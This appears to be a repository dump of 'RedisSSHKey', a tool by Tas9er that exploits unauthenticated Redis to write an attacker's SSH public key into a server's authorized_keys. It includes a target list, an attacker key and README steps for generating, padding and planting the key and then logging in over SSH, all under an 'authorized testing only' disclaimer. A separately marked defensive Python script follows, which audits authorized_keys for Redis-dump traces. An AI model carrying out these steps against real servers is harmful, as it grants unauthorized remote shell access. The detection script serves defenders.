├── url.txt
├── example01.png
├── example02.jpg
├── RedisSSHKey.jar
├── key.txt
└── README.md

/url.txt:
--------------------------------------------------------------------------------
192.168.111.222:6379
192.168.111.111:6379

--------------------------------------------------------------------------------
/example01.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tas9er/RedisSSHKey/HEAD/example01.png

--------------------------------------------------------------------------------
/example02.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tas9er/RedisSSHKey/HEAD/example02.jpg

--------------------------------------------------------------------------------
/RedisSSHKey.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tas9er/RedisSSHKey/HEAD/RedisSSHKey.jar

--------------------------------------------------------------------------------
/key.txt:
--------------------------------------------------------------------------------
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZQJWFL3VHgZW8KZian56XF/uxFW9LLbJjM21XXJwlXELSeMFwuomt6vQruiCe9UVv2krb3X+mKsv+CIWbeHqQXXuH2x/9T1lcFSJGm8I8V0yEKguxRz0kyRQFqn5LypDJF83fy2vdkR4+3KmAwKs7X3Cd8B3s0YPhVE+vuRYni+FC3OlMPWd7N7Ai6xZC96CzfeF/lwGrz8yydybTJowLI0Mfa851/bE+hDu28DaOaQ4Den2ZMjDjyEPNSQJK9xu34sEMxHfYT+tieGBkY75CR8Jzw6kiWfQOVc8v6eJ2v2hQngQYIgRWBrdSB7lk+OBsvR9m5bzcK5eZKCWtVyPN root@admins-PC

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
**Redis Unauthorized-Access SSH Public Key Write Vulnerability Verification**

**Code By: Tas9er**



Warning
This tool is intended to help enterprises quickly locate and fix vulnerabilities. It is for authorized security testing only. Strictly comply with the Cybersecurity Law of the People's Republic of China; unauthorized, illegal attacks on sites are prohibited.



Authorized test case:

Collect the targets the enterprise has authorized for security testing and put them in url.txt.

Example:
Ⅰ: It is recommended that the attacking machine run Linux.
Ⅱ: On the attacking Linux machine, run: ssh-keygen -t rsa
Ⅲ: On the attacking Linux machine, run: (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > fuck.txt
Ⅳ: Copy the contents of the generated fuck.txt into key.txt in this tool's directory.
Ⅴ: After a successful attack, you can run ssh ip directly on the attacking Linux machine.

java -jar RedisSSHKey.jar

![example01](example01.png)

![example02](example02.jpg)

After the run finishes, the vulnerable sites and the results are saved in the current directory. The run also serves, to some extent, as an availability check of the security devices deployed for the enterprise's servers.



--------------------------------------------------------------------------------
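For triage on a host that exposed Redis, the following added example (not part of the Tas9er repository) checks an `authorized_keys` file for traces of a Redis-written key. It assumes the file was produced as a Redis RDB dump, which begins with `REDIS` plus a four-digit version and carries binary bytes around the key, and that the key is padded with blank lines as in step Ⅲ of the README; the sample inputs and the function names are constructed for illustration.

```python
import re

RDB_MAGIC = re.compile(rb"REDIS\d{4}")  # header that starts every Redis RDB dump
KEY_PREFIXES = (b"ssh-", b"ecdsa-sha2-", b"sk-")

# Constructed samples: placeholder key material, not real keys or a real dump.
CLEAN = b"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPLACEHOLDER ops@bastion\n"
TAINTED = (
    b"REDIS0009\xfa\tredis-ver\x055.0.7\xfe\x00\xfb\x01\x00\x00\x01x\x40\x50"
    b"\n\n\nssh-rsa AAAAB3NzaC1yc2EPLACEHOLDER root@example\n\n\n\n"
    b"\xff\x11\x22\x33\x44\x55\x66\x77\x88")

def _is_binary(line: bytes) -> bool:
    """True if the line has control bytes or invalid UTF-8 (never valid in this file)."""
    if any(b < 0x20 and b not in (0x09, 0x0D) for b in line) or 0x7F in line:
        return True
    try:
        line.decode("utf-8")
    except UnicodeDecodeError:
        return True
    return False

def audit_authorized_keys(data: bytes) -> dict:
    """Report RDB header, binary lines, and key lines (with blank-line padding flag)."""
    lines = data.split(b"\n")
    report = {"rdb_magic": bool(RDB_MAGIC.search(data)), "binary_lines": [], "keys": []}
    for n, line in enumerate(lines, 1):
        if _is_binary(line):
            report["binary_lines"].append(n)
            continue
        fields = line.split()
        # Simplification: entries with leading options (command=, from=) are skipped.
        if len(fields) >= 2 and fields[0].startswith(KEY_PREFIXES):
            padded = (n >= 2 and lines[n - 2] == b""
                      and n < len(lines) and lines[n] == b"")
            report["keys"].append({"line": n, "blank_padded": padded,
                                   "comment": b" ".join(fields[2:]).decode()})
    report["suspicious"] = report["rdb_magic"] or bool(report["binary_lines"])
    return report

if __name__ == "__main__":
    print(audit_authorized_keys(TAINTED))
```

Any key listed in a report marked `suspicious` should be treated as unauthorized until its owner is confirmed; the `blank_padded` flag alone is only a weak hint.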